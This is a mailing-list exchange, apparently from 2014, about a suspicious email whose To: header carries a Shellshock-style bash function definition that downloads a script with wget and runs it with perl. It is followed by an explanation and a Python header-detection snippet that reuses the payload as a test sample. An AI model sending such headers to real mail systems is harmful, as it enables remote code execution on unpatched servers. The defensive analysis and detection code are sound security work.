On 7 October 2014 00:07, Bill Oliver <vendor@xxxxxxxxxxxxx> wrote:
>
> First, I apologize for this not being fedora-specific, but I just got
> the oddest email. It looks like an intrusion attempt, trying to get
> sendmail to execute a perl script. Is anybody familiar with this
> particular pattern?
>
> The email is below.
>
>
> Return-Path: <MAILER-DAEMON@xxxxxxxxxxxxx>
> Received: from incenclick.com (incenclick.com [184.95.45.61] (may be
> forged))
> by hope.billoblog.com (8.14.4/8.14.4) with SMTP id s96FKVOY029890
> for <nobody>; Mon, 6 Oct 2014 15:20:31 GMT
> Resent-Message-Id: <201410061520.s96FKVOY029890@xxxxxxxxxxxxxxxxxx>
> X-Authentication-Warning: hope.billoblog.com: incenclick.com
> [184.95.45.61] (may be forged) didn't use HELO protocol
> To:() {
> :;;};wget.http://YOUREXPLOITHERE.-O/tmp/bb;perl/tmp/bb@xxxxxxxxxxxxxxxxxx;;

etc.

If you had to guess what exploit of the month was going to be what would you say ;)

This is someone hoping there's a mail client or server somewhere (and
maybe there is) that will load those headers into environment
variables and shell out, causing unpatched bash to download and run a
script.

--
imalone
http://ibmalone.blogspot.co.uk
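The header pattern discussed in this thread (a header value that begins with a bash function definition) can be flagged on the receiving side before any header reaches a shell environment. This is an added example, not part of the original thread; the sample message is constructed from the header quoted above, with `example.org`, `sender.example`, `192.0.2.10` and the SMTP id as placeholder values.

```python
import re
from email import message_from_string
from email.policy import compat32

# Unpatched bash treated an environment value starting with the literal
# prefix "() {" as a function definition to import. The regex also accepts
# whitespace variations, so it errs on the side of flagging.
FUNC_DEF = re.compile(r"^\s*\(\s*\)\s*\{")

def suspicious_headers(raw_message):
    """Return [(header_name, unfolded_value)] for every header whose value
    looks like a bash function definition."""
    msg = message_from_string(raw_message, policy=compat32)
    hits = []
    for name, value in msg.items():
        # Folded headers continue on lines that start with whitespace;
        # join them so a definition split across lines is still seen.
        unfolded = re.sub(r"\r?\n[ \t]+", " ", str(value))
        if FUNC_DEF.match(unfolded):
            hits.append((name, unfolded))
    return hits

# Constructed sample: mirrors the folded To: header quoted in the thread.
SAMPLE = (
    "Return-Path: <MAILER-DAEMON@example.org>\n"
    "Received: from sender.example (sender.example [192.0.2.10])\n"
    "\tby mail.example.org with SMTP id CONSTRUCTED1\n"
    "To:() {\n"
    " :;;};wget.http://YOUREXPLOITHERE.-O/tmp/bb;perl/tmp/bb@example.org;;\n"
    "Subject: test\n"
    "\n"
    "body\n"
)

# Constructed benign message for comparison.
BENIGN = (
    "From: alice@example.org\n"
    "To: bob@example.org\n"
    "Subject: meeting (room 2) { draft }\n"
    "\n"
    "hello\n"
)

if __name__ == "__main__":
    for name, value in suspicious_headers(SAMPLE):
        print(f"suspicious header {name}: {value!r}")
    print("benign hits:", suspicious_headers(BENIGN))
```

A filter like this is a detection aid only; the fix for the underlying issue is a patched bash and not passing untrusted header values into the environment of a shell.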